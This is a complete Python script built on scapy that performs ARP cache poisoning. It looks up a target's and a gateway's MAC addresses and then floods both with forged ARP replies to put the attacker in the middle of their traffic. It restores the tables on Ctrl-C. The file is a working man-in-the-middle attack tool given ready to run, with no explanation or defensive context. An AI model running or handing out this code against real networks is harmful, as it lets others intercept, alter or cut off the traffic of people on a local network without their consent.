arp_poisoning.py

from scapy.all import *

def getmac(targetip):
	arppacket = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=targetip)
	targetmac = srp(arppacket, timeout=2 , verbose= False)[0][0][1].hwsrc
	return targetmac

def spoofarpcache(targetip, targetmac, sourceip):
	spoofed = ARP(op=2 , pdst=targetip, psrc=sourceip, hwdst= targetmac)
	send(spoofed, verbose= False)

def restorearp(targetip, targetmac, sourceip, sourcemac):
	packet = ARP(op=2 , hwsrc=sourcemac , psrc= sourceip, hwdst= targetmac , pdst= targetip)
	send(packet, verbose=False)
	print "ARP Table restored to normal for", targetip

if len(sys.argv) != 3:
	print "Usage: arp_poisoning.py targetIP getwayIP"
	exit(1)

targetip = str(sys.argv[1])
gatewayip = str(sys.argv[2])
    
targetmac = getmac(targetip)
print "Target MAC", targetmac
    
gatewaymac = getmac(gatewayip)
print "Gateway MAC:", gatewaymac
	
try:
	print "Sending spoofed ARP responses"
	while True:
		spoofarpcache(targetip, targetmac, gatewayip)
		spoofarpcache(gatewayip, gatewaymac, targetip)
except KeyboardInterrupt:
	print "ARP spoofing stopped"
	restorearp(gatewayip, gatewaymac, targetip, targetmac)
	restorearp(targetip, targetmac, gatewayip, gatewaymac)
	quit()